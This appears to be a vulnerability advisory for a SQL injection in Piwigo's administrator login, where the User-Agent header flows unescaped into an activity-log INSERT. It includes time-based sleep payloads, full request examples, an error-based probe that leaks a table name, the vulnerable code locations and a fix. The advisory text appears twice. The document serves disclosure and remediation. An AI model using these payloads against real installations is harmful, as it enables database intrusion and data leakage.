Summary
There is SQL Injection in the login of the administrator screen.
Details
The SQL statement that acquires the HTTP Header "User-Agent" is vulnerable at the endpoint that records user information when logging in to the administrator screen.
It is possible to execute arbitrary SQL statements.
PoC
- Access the admin login page.
- Log in with the correct information as a user who can log in to the administrator screen.
- Insert the SQL Payload into the HTTP header "User-Agent" of the login request and send the request.
- Any inserted SQL statement can be executed.
Target
- Endpoint:
/identification.php
- Parameter (header):
User-Agent
Required Permissions
Users who can log in to the administrator screen. (even with low privileges)
PoC Test
- Payload:
1))%20or%20sleep(5)--
- Patload:
1))%20or%20sleep(10)--
- Payload:
1))%20or%20sleep(20)--
Request Example
Admin screen login request
POST /<Path>/identification.php HTTP/1.1
...
User-Agent: 1))%20or%20sleep(20)--
...
username=admin&password=pass&redirect=%252F<Path>%252Fadmin.php&login=%E9%80%81%E4%BF%A1
Other
You can also see that the table name (piwi_activity) is output from the error statement by inserting a string that breaks the SQL statement.
POST /<Path>/identification.php HTTP/1.1
...
User-Agent: '">{{7*7}}${2*2}
...
username=admin&password=pass&redirect=%252F<Path>%252Fadmin.php&login=%E9%80%81%E4%BF%A1
HTTP/1.1 200 OK
...
Warning: [mysql error 1064] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">{{7*7}}${2*2}')' at line 3
INSERT INTO `piwi_activity`
(`object`,`object_id`,`action`,`performed_by`,`session_idx`,`ip_address`,`details`,`user_agent`)
VALUES('user','1','login','1','4ad3723e62d223928188721376fc01b3','<Private IP address>','a:1:{s:6:\"script\";s:14:\"identification\";}',''">{{7*7}}${2*2}') in /home/soft/public_html/<Path>/include/dblayer/functions_mysqli.inc.php on line 847
...Screen showing execution results
/admin.php?page=user_activity
Impact
Any SQL statement can be executed.
Doing so may leak information in the database.
Cause
where the user can insert
|
'user_agent' => $user_agent, |
Where the data inserted by the user is executed as-is by SQL
|
function mass_inserts($table_name, $dbfields, $datas, $options=array()) |
Measures
If you want to execute a SQL statement verbatim with user-enterable parameters, be sure to escape the parameter contents appropriately.
Reference
Summary
There is SQL Injection in the login of the administrator screen.
Details
The SQL statement that acquires the HTTP Header "User-Agent" is vulnerable at the endpoint that records user information when logging in to the administrator screen.
It is possible to execute arbitrary SQL statements.
PoC
Target
/identification.phpUser-AgentRequired Permissions
Users who can log in to the administrator screen. (even with low privileges)
PoC Test
1))%20or%20sleep(5)--1))%20or%20sleep(10)--1))%20or%20sleep(20)--Request Example
Admin screen login request
Other
You can also see that the table name (
piwi_activity) is output from the error statement by inserting a string that breaks the SQL statement.Screen showing execution results
/admin.php?page=user_activityImpact
Any SQL statement can be executed.
Doing so may leak information in the database.
Cause
where the user can insert
Piwigo/include/functions.inc.php
Line 621 in c01ec38
Where the data inserted by the user is executed as-is by SQL
Piwigo/include/dblayer/functions_mysqli.inc.php
Line 491 in c01ec38
Measures
If you want to execute a SQL statement verbatim with user-enterable parameters, be sure to escape the parameter contents appropriately.
Reference